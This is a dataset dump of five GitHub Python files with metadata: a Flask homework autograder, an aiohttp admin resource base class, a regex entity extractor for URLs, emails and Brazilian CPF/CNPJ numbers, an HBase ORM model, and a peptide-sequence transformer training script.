+{"seq_id": "9763555449", "text": "import os\nimport sys\nimport pickle\nimport urllib.request\nDIR_PATH = os.path.dirname(os.path.realpath(__file__)) # NOQA\nsys.path.append(DIR_PATH) # NOQA\n\nfrom flask import Flask, jsonify\nfrom flask_cors import CORS\n\nfrom logging_config import logger\nfrom autograder import autograde, check_flake8\nfrom utils import make_dirs\n\n\napp = Flask(__name__)\nCORS(app)\n\nTASK_NUM = 8\n\n\n@app.route('/hi', methods=['GET'])\ndef hi():\n return jsonify(\n {\"message\": \"Hi! This is the server for Introduction to Computer.\"})\n\n\ndef get_data_and_ans_paths():\n public_data_filename = os.path.join(\n DIR_PATH, 'test_data', 'public_data.yaml')\n public_ans_filename = os.path.join(\n DIR_PATH, 'test_data', 'public_answers.yaml')\n\n private_data_filename = os.path.join(\n DIR_PATH, 'test_data', 'private_data.yaml')\n private_ans_filename = os.path.join(\n DIR_PATH, 'test_data', 'private_answers.yaml')\n\n # Dowonload private data\n try:\n private_data_url = os.environ.get('PRIVATE_DATA_URL')\n urllib.request.urlretrieve(private_data_url, private_data_filename)\n private_ans_url = os.environ.get('PRIVATE_ANS_URL')\n urllib.request.urlretrieve(private_ans_url, private_ans_filename)\n except Exception as err:\n logger.info(err, exc_info=True)\n\n return (\n public_data_filename, public_ans_filename,\n private_data_filename, private_ans_filename\n )\n\n\ndef grade():\n '''\n Get test results of all students in src/students/\n '''\n # Save results to a dict\n results = {}\n\n student_ids = os.listdir(os.path.join(DIR_PATH, 'students'))\n student_ids = [x[:-3] for x in student_ids if x[-3:] == '.py']\n for student_id in student_ids:\n student_result = {}\n\n (public_data_filename, public_ans_filename, private_data_filename,\n private_ans_filename) = get_data_and_ans_paths()\n # Test public data\n try:\n logger.info(\"Testing public data\")\n student_result['public_scores'] = autograde(\n student_id, range(1, TASK_NUM + 1),\n public_data_filename, public_ans_filename\n )\n student_result['import'] = \"Success\"\n except Exception as err:\n logger.info(err, exc_info=True)\n student_result['import'] = \"Failed\"\n\n # Test private data\n try:\n logger.info(\"Testing private data\")\n student_result['private_scores'] = autograde(\n student_id, range(1, TASK_NUM + 1),\n private_data_filename,\n private_ans_filename\n )\n except Exception as err:\n logger.info(err, exc_info=True)\n\n # Check flake8\n student_file = os.path.join(DIR_PATH, 'students', student_id + '.py')\n student_result['flake8'] = check_flake8(student_file)\n\n # Add to all results\n results[student_id] = student_result\n return {\n \"results\": results,\n \"task_num\": TASK_NUM,\n \"student_num\": len(student_ids)\n }\n\n\n@app.route('/get_results', methods=['GET'])\ndef get_results():\n return jsonify(results)\n\n\n# Dump results out offline to prevent servertimeout\nresults_dir = os.path.join(DIR_PATH, 'results')\nmake_dirs(results_dir)\nresults_filename = os.path.join(results_dir, 'results.pickle')\nif os.path.exists(results_filename):\n with open(results_filename, 'rb') as fin:\n results = pickle.load(fin)\nelse:\n results = grade()\n with open(results_filename, 'wb') as fout:\n pickle.dump(results, fout)\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "amjltc295/PythonHomework", "sub_path": "src/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 3611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 41, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 41, "usage_type": "attribute"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 42, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 42, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 42, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 44, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 44, "usage_type": "name"}, {"api_name": "logging_config.logger.info", "line_number": 46, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 46, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "logging_config.logger.info", "line_number": 70, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 70, "usage_type": "name"}, {"api_name": "autograder.autograde", "line_number": 71, "usage_type": "call"}, {"api_name": "logging_config.logger.info", "line_number": 77, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 77, "usage_type": "name"}, {"api_name": "logging_config.logger.info", "line_number": 82, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 82, "usage_type": "name"}, {"api_name": "autograder.autograde", "line_number": 83, "usage_type": "call"}, {"api_name": "logging_config.logger.info", "line_number": 89, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 89, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "autograder.check_flake8", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "utils.make_dirs", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 115, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 119, "usage_type": "call"}]}
+{"seq_id": "11110242077", "text": "from abc import abstractmethod, ABCMeta\n\nfrom .security import Permissions, require\nfrom .utils import json_response, validate_query\n\n\nclass AbstractResource(metaclass=ABCMeta):\n\n def __init__(self, *, primary_key, resource_name=None):\n class_name = self.__class__.__name__.lower()\n self._resource_name = resource_name or class_name\n self._primary_key = primary_key\n\n @property\n def primary_key(self):\n return self._primary_key\n\n @abstractmethod\n async def list(self, request): # pragma: no cover\n await require(request, Permissions.view)\n q = validate_query(request.GET)\n assert q\n\n # total number of results should be supplied in separate\n headers = {'X-Total-Count': str(0)}\n return json_response({}, headers=headers)\n\n @abstractmethod\n async def detail(self, request): # pragma: no cover\n await require(request, Permissions.view)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n @abstractmethod\n async def create(self, request): # pragma: no cover\n await require(request, Permissions.add)\n return json_response({})\n\n @abstractmethod\n async def update(self, request): # pragma: no cover\n await require(request, Permissions.edit)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n @abstractmethod\n async def delete(self, request): # pragma: no cover\n await require(request, Permissions.delete)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n def setup(self, app, base_url):\n url = str(base_url / self._resource_name)\n url_id = url + '/{entity_id}'\n add_route = app.router.add_route\n add_route('GET', url, self.list)\n add_route('GET', url_id, self.detail)\n add_route('POST', url, self.create)\n add_route('PUT', url_id, self.update)\n add_route('DELETE', url_id, self.delete)\n", "repo_name": "roscopecoltran/sniperkit-services", "sub_path": "dockerfiles/front-end/admin-interface/aiohttp/admin-elastic/sps/aiohttp_admin/resource.py", "file_name": "resource.py", "file_ext": "py", "file_size_in_byte": 2071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABCMeta", "line_number": 7, "usage_type": "name"}, {"api_name": "security.require", "line_number": 20, "usage_type": "call"}, {"api_name": "security.Permissions.view", "line_number": 20, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 20, "usage_type": "name"}, {"api_name": "utils.validate_query", "line_number": 21, "usage_type": "call"}, {"api_name": "utils.json_response", "line_number": 26, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 18, "usage_type": "name"}, {"api_name": "security.require", "line_number": 30, "usage_type": "call"}, {"api_name": "security.Permissions.view", "line_number": 30, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 30, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 33, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 28, "usage_type": "name"}, {"api_name": "security.require", "line_number": 37, "usage_type": "call"}, {"api_name": "security.Permissions.add", "line_number": 37, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 37, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 38, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 35, "usage_type": "name"}, {"api_name": "security.require", "line_number": 42, "usage_type": "call"}, {"api_name": "security.Permissions.edit", "line_number": 42, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 42, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 45, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 40, "usage_type": "name"}, {"api_name": "security.require", "line_number": 49, "usage_type": "call"}, {"api_name": "security.Permissions.delete", "line_number": 49, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 49, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 52, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 47, "usage_type": "name"}]}
+{"seq_id": "3221604569", "text": "from io import StringIO\nfrom fastapi import Depends\nimport pandas as pd\nimport re\n\nfrom api.crud.crud import create_excerpt_metadata, create_named_entity\nfrom api.model.schemas import ExcerptMetadataCreate, NamedEntityCreate\n\nfrom database.connection import SessionLocal\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\ndef find_regex(id:str, text:str) -> list:\n docs=[]\n cnt=0\n\n url_extract_pattern = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n mail_extract_pattern = \"([a-z0-9_.-]+@[a-z0-9_.-]+)\"\n cpf_extract_pattern = \"\\d{3}\\.?\\d{3}\\.?\\d{3}\\-?\\d{2}\"\n cnpj_extract_pattern = \"\\d{2}\\.?\\d{3}\\.?\\d{3}\\/\\d{4}-\\d{2}\"\n\n for url in re.finditer(url_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': url.group(),\n 'start_offset': url.start(),\n 'end_offset': url.start() + len(url.group()),\n 'entity_type':\"URL\"})\n\n for email in re.finditer(mail_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': email.group(),\n 'start_offset': email.start(),\n 'end_offset': email.start() + len(email.group()),\n 'entity_type':\"E-mail\"})\n\n for cpf in re.finditer(cpf_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': cpf.group(),\n 'start_offset': cpf.start(),\n 'end_offset': cpf.start() + len(cpf.group()),\n 'entity_type':\"CPF\"})\n\n for cnpj in re.finditer(cnpj_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': cnpj.group(),\n 'start_offset': cnpj.start(),\n 'end_offset': cnpj.start() + len(cnpj.group()),\n 'entity_type':\"CNPJ\"})\n\n #if docs != []:\n # print(docs)\n #return docs\n\n return docs if docs else []\n\ndef execute_csv_regex(file):\n\n contents = file.file.read()\n s = str(contents,'utf-8')\n data = StringIO(s)\n df = pd.read_csv(data)\n\n count_excerpt = 0\n count_named_entities = 0\n for index, row in df.iterrows():\n\n result = str(row['excerpt']).replace('- ', '')\n docs = find_regex(row['excerpt_id'], result)\n excerpt_metadata = ExcerptMetadataCreate(excerpt_id=row['excerpt_id'], uf=row['source_state_code'], cidade=row['source_territory_name'], tema=row['excerpt_subthemes'], data=row['source_created_at'])\n db_gen = get_db()\n db = next(db_gen)\n count_excerpt+=1 if (create_excerpt_metadata(db, excerpt_metadata)) else False\n if len(docs) > 0:\n for name in docs:\n item = NamedEntityCreate(excerpt_id=name['excerpt_id'], content=name['content'], start_offset=name['start_offset'], end_offset=name['end_offset'], entity_type=name['entity_type'])\n\n count_named_entities+=1 if (create_named_entity(db, item)) else False\n\n return \"Saved \" + str(count_excerpt) + \" excerpt ids and \" + str(count_named_entities) + \" named entitites\"", "repo_name": "MLRG-CEFET-RJ/qdrec", "sub_path": "scripts/append_regex.py", "file_name": "append_regex.py", "file_ext": "py", "file_size_in_byte": 3322, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "database.connection.SessionLocal", "line_number": 12, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 27, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 36, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 45, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 54, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 74, "usage_type": "call"}, {"api_name": "api.model.schemas.ExcerptMetadataCreate", "line_number": 82, "usage_type": "call"}, {"api_name": "api.crud.crud.create_excerpt_metadata", "line_number": 85, "usage_type": "call"}, {"api_name": "api.model.schemas.NamedEntityCreate", "line_number": 88, "usage_type": "call"}, {"api_name": "api.crud.crud.create_named_entity", "line_number": 90, "usage_type": "call"}]}
+{"seq_id": "70418882410", "text": "from .exceptions import EmptyColumnError, BadRowKeyError\nfrom .fields import HBaseField, IntegerField, TimestampField\nfrom django.conf import settings\nfrom django_hbase.client import HBaseClient\n\nclass HBaseModel:\n\n class Meta:\n table_name = None\n row_key = () # None\n\n @classmethod\n def get_table(cls):\n conn = HBaseClient.get_connection()\n return conn.table(cls.get_table_name())\n\n @property\n def row_key(self):\n return self.serialize_row_key(self.__dict__)\n\n @classmethod\n def get_field_hash(cls):\n field_hash = {}\n for field in cls.__dict__:\n field_obj = getattr(cls, field)\n # 可以写成 for field, field_obj in cls.__dict__.items() 吗?\n if isinstance(field_obj, HBaseField):\n field_hash[field] = field_obj\n return field_hash\n\n def __init__(self, **kwargs):\n for key, field in self.get_field_hash().items():\n value = kwargs.get(key)\n setattr(self, key, value)\n\n @classmethod\n def init_from_row(cls, row_key, row_data):\n if not row_data:\n return None\n data = cls.deserialize_row_key(row_key)\n for column_key, column_value in row_data.items():\n # remove column family\n column_key = column_key.decode('utf-8')\n key = column_key[column_key.find(':') + 1:]\n data[key] = cls.deserialize_field(key, column_value)\n return cls(**data)\n\n @classmethod\n def serialize_row_key(cls, data, is_prefix=False):\n \"\"\"\n serialize dict to bytes (not str)\n {key1: val1} => b\"val1\"\n {key1: val1, key2: val2} => b\"val1:val2\"\n {key1: val1, key2: val2, key3: val3} => b\"val1:val2:val3\"\n \"\"\"\n field_hash = cls.get_field_hash()\n values = []\n for key in cls.Meta.row_key:\n field = field_hash.get(key)\n if field.column_family: # 也许这个不用了\n continue\n value = data.get(key)\n if value is None:\n if not is_prefix:\n raise BadRowKeyError(f\"{key} is missing in row key\")\n break\n value = cls.serialize_field(field, value)\n if ':' in value:\n raise BadRowKeyError(f\"{key} should not contain ':' in value: {value}\")\n values.append(value)\n return bytes(':'.join(values), encoding='utf-8')\n\n @classmethod\n def deserialize_row_key(cls, row_key):\n \"\"\"\n \"val1\" => {'key1': val1, 'key2': None, 'key3': None}\n \"val1:val2\" => {'key1': val1, 'key2': val2, 'key3': None}\n \"val1:val2:val3\" => {'key1': val1, 'key2': val2, 'key3': val3}\n \"\"\"\n data = {}\n if isinstance(row_key, bytes):\n row_key = row_key.decode('utf-8')\n\n # val1:val2 => val1:val2: 方便每次 find(':') 都能找到一个 val\n row_key = row_key + ':'\n for key in cls.Meta.row_key:\n index = row_key.find(':')\n if index == -1:\n break\n data[key] = cls.deserialize_field(key, row_key[:index])\n row_key = row_key[index + 1:]\n return data\n\n @classmethod\n def serialize_field(cls, field, value):\n value = str(value)\n if isinstance(field, IntegerField):\n # 因为排序规则是按照字典序排序,那么就可能出现 1 10 2 这样的排序\n # 解决的办法是固定 int 的位数为 16 位(8的倍数更容易利用空间),不足位补 0\n value = str(value)\n while len(value) < 16:\n value = '0' + value\n if field.reverse:\n value = value[::-1]\n return value\n\n @classmethod\n def deserialize_field(cls, key, value):\n field = cls.get_field_hash()[key]\n if field.reverse:\n value = value[::-1]\n if field.field_type in [IntegerField.field_type, TimestampField.field_type]:\n return int(value)\n return value\n\n @classmethod\n def serialize_row_data(cls, data):\n row_data = {}\n field_hash = cls.get_field_hash()\n for key, field in field_hash.items():\n if not field.column_family:\n continue\n column_key = '{}:{}'.format(field.column_family, key)\n column_value = data.get(key)\n if column_value is None:\n continue\n row_data[column_key] = cls.serialize_field(field, column_value)\n return row_data\n\n def save(self, batch=None):\n row_data = self.serialize_row_data(self.__dict__)\n if len(row_data) == 0:\n raise EmptyColumnError()\n if batch:\n batch.put(self.row_key, row_data)\n else:\n table = self.get_table()\n table.put(self.row_key, row_data)\n\n @classmethod\n def get(cls, **kwargs):\n row_key = cls.serialize_row_key(kwargs)\n table = cls.get_table()\n row_data = table.row(row_key)\n return cls.init_from_row(row_key, row_data)\n\n @classmethod\n def create(cls, batch=None, **kwargs):\n instance = cls(**kwargs)\n instance.save(batch=batch)\n return instance\n\n @classmethod\n def batch_create(cls, batch_data):\n table = cls.get_table()\n batch = table.batch()\n results = []\n for data in batch_data:\n results.append(cls.create(batch=batch, **data))\n batch.send()\n return results\n\n @classmethod\n def get_table_name(cls):\n if not cls.Meta.table_name:\n raise NotImplementedError('Missing table_name in HBaseModel meta class')\n if settings.TESTING:\n # return 'test_{}'.format(cls.Meta.table_name)\n return f'test_{cls.Meta.table_name}' # 现在流行这么写\n return cls.Meta.table_name\n\n @classmethod\n def drop_table(cls):\n if not settings.TESTING:\n raise Exception('You can not drop table outside of unit tests')\n conn = HBaseClient.get_connection()\n conn.delete_table(cls.get_table_name(), True)\n\n @classmethod\n def create_table(cls):\n if not settings.TESTING:\n raise Exception('You can not create table outside of unit tests')\n conn = HBaseClient.get_connection()\n # convert table name from bytes to str\n tables = [table.decode('utf-8') for table in conn.tables()]\n if cls.get_table_name() in tables:\n return\n column_families = {\n field.column_family: dict()\n for key, field in cls.get_field_hash().items()\n if field.column_family is not None\n }\n conn.create_table(cls.get_table_name(), column_families)\n\n # 实现一个 get_or_create 的方法,返回 (instance, created)\n\n @classmethod\n def serialize_row_key_from_tuple(cls, row_key_tuple):\n if row_key_tuple is None:\n return None\n data = {\n key: value\n for key, value in zip(cls.Meta.row_key, row_key_tuple)\n }\n return cls.serialize_row_key(data, is_prefix=True)\n\n @classmethod\n def filter(cls, start=None, stop=None, prefix=None, limit=None, reverse=False):\n # serialize tuple to str\n row_start = cls.serialize_row_key_from_tuple(start)\n row_stop = cls.serialize_row_key_from_tuple(stop)\n row_prefix = cls.serialize_row_key_from_tuple(prefix)\n\n # scan table\n table = cls.get_table()\n rows = table.scan(row_start, row_stop, row_prefix, limit=limit, reverse=reverse)\n\n # deserialize to instance list\n results = []\n for row_key, row_data in rows:\n instance = cls.init_from_row(row_key, row_data)\n results.append(instance)\n return results\n\n @classmethod\n def delete(cls, **kwargs):\n row_key = cls.serialize_row_key(kwargs)\n table = cls.get_table()\n return table.delete(row_key)", "repo_name": "joyu-ai/django-twitter", "sub_path": "django_hbase/models/hbase_models.py", "file_name": "hbase_models.py", "file_ext": "py", "file_size_in_byte": 7972, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 14, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 14, "usage_type": "name"}, {"api_name": "fields.HBaseField", "line_number": 27, "usage_type": "argument"}, {"api_name": "exceptions.BadRowKeyError", "line_number": 65, "usage_type": "call"}, {"api_name": "exceptions.BadRowKeyError", "line_number": 69, "usage_type": "call"}, {"api_name": "fields.IntegerField", "line_number": 97, "usage_type": "argument"}, {"api_name": "fields.IntegerField.field_type", "line_number": 112, "usage_type": "attribute"}, {"api_name": "fields.IntegerField", "line_number": 112, "usage_type": "name"}, {"api_name": "fields.TimestampField.field_type", "line_number": 112, "usage_type": "attribute"}, {"api_name": "fields.TimestampField", "line_number": 112, "usage_type": "name"}, {"api_name": "exceptions.EmptyColumnError", "line_number": 133, "usage_type": "call"}, {"api_name": "django.conf.settings.TESTING", "line_number": 167, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 167, "usage_type": "name"}, {"api_name": "django.conf.settings.TESTING", "line_number": 174, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 174, "usage_type": "name"}, {"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 176, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 176, "usage_type": "name"}, {"api_name": "django.conf.settings.TESTING", "line_number": 181, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 181, "usage_type": "name"}, {"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 183, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 183, "usage_type": "name"}]}
+{"seq_id": "12429861819", "text": "from gensim.models import KeyedVectors\nimport pandas as pd\nimport numpy as np\nimport time\nimport tensorflow as tf\nimport Transformer as tfr\n\nnum_shape = 512\n\nion_w2v = KeyedVectors.load_word2vec_format(\"ion_w2v\")\namino_w2v = KeyedVectors.load_word2vec_format(\"amino_w2v\")\ndata = pd.read_csv(\"data.csv\")\nprint(len(data[\"mz\"]))\nprint(len(data[\"seq\"]))\nmz_mx_len = 0\nseq_mx_len = 0\nfor i in data[\"mz\"]:\n mz_array = np.fromstring(i[1:-1], dtype=float, sep=' ')\n mz_mx_len = max(mz_mx_len,len(mz_array))\n\nfor i in data[\"seq\"]:\n seq_mx_len = max(seq_mx_len,len(i))\nseq_mx_len += 2\nzero = []\nfor i in range(num_shape):\n zero.append(0)\ninput_array = []\noutput_array = []\ncnt = 0\ntotal = len(data[\"mz\"])\nload_count = np.zeros((101))\nmx_val = 0\nfor i in data[\"mz\"]:\n mz_array = np.fromstring(i[1:-1], dtype=float, sep=' ')\n vv = []\n for p in mz_array:\n rval = p * 10\n rval = round(rval)\n mx_val = max(mx_val,rval)\n vv.append(rval)\n diff = mz_mx_len - len(mz_array)\n for p in range(diff):\n vv.append(0)\n input_array.append(vv)\n if cnt%50 == 0:\n per = int(round((cnt*100/total)))\n if per%10 == 0 and load_count[per] == 0:\n print(\"{} % process....\".format(round(cnt*100/total),-1))\n load_count[per] = 1\n cnt = cnt + 1\n\nprint(\"Succes input array\")\ntime.sleep(1)\n\nload_count = np.zeros((101))\ncnt = 0\nfor i in data[\"seq\"]:\n vv = []\n vv.append(1)\n for p in i:\n vv.append(ord(p)-ord('A') + 3)\n vv.append(2)\n diff = seq_mx_len - len(i) - 2\n for p in range(diff):\n vv.append(0)\n output_array.append(vv)\n if cnt%50 == 0:\n per = int(round((cnt*100/total)))\n if per %10 == 0 and load_count[per] == 0:\n print(\"{} % process....\".format(round(cnt * 100 / total), -1))\n load_count[per] = 1\n cnt = cnt + 1\n\nprint(\"Success output array\")\n\nprint(\"input size : {} , output size :{}\".format(len(input_array),len(output_array)))\n\nprint(\"go into Transformer\")\ntime.sleep(1)\n\nprint(\"max_value : {}\".format(mx_val))\ndmodel = 512\nnum_layer = 6\nnum_head = 8\ndff = 2048\ndropout = 0.3\ninput_size = 20000\noutput_size = 30\nepoch = 20\nBATCH_SIZE = 20\nBUFFER_SIZE = 20000\ninput_array = np.array(input_array)\noutput_array = np.array(output_array)\n\nATCH_SIZE = 64\nBUFFER_SIZE = 20000\nprint(seq_mx_len)\ndataset = tf.data.Dataset.from_tensor_slices((\n {\n 'inputs': input_array,\n 'dec_inputs': output_array[:, :-1]\n },\n {\n 'outputs': output_array[:, 1:]\n },\n))\n\ndataset = dataset.cache()\ndataset = dataset.shuffle(BUFFER_SIZE)\ndataset = dataset.batch(BATCH_SIZE)\ndataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\ntf.keras.backend.clear_session()\nmodel = tfr.transformer(vocab_size=input_size,\n num_layers=num_layer,\n dff=dff,\n d_model=dmodel,\n num_heads=num_head,\n dropout=dropout)\nlearning_rate = tfr.CustomSchedule(dmodel)\n\noptimizer = tf.keras.optimizers.Adam(\n learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)\n\ndef loss_function(y_true, y_pred):\n y_true = tf.reshape(y_true, shape=(-1, seq_mx_len - 1))\n\n loss = tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=True, reduction='none')(y_true, y_pred)\n\n mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)\n loss = tf.multiply(loss, mask)\n\n return tf.reduce_mean(loss)\n\ndef accuracy(y_true, y_pred):\n print(y_true)\n y_true = tf.reshape(y_true, shape=(-1, seq_mx_len - 1))\n return tf.keras.metrics.sparse_categorical_accuracy(y_true, y_pred)\n\nmodel.compile(optimizer=optimizer, loss=loss_function, metrics=[accuracy])\nmodel.fit(dataset,epochs=epoch)", "repo_name": "dtc03012/Peptide_Search", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 10, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors", "line_number": 10, "usage_type": "name"}, {"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 11, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors", "line_number": 11, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 55, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 111, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.backend.clear_session", "line_number": 113, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 113, "usage_type": "attribute"}, {"api_name": "Transformer.transformer", "line_number": 114, "usage_type": "call"}, {"api_name": "Transformer.CustomSchedule", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 128, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 131, "usage_type": "attribute"}, {"api_name": "tensorflow.multiply", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.sparse_categorical_accuracy", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 139, "usage_type": "attribute"}]}
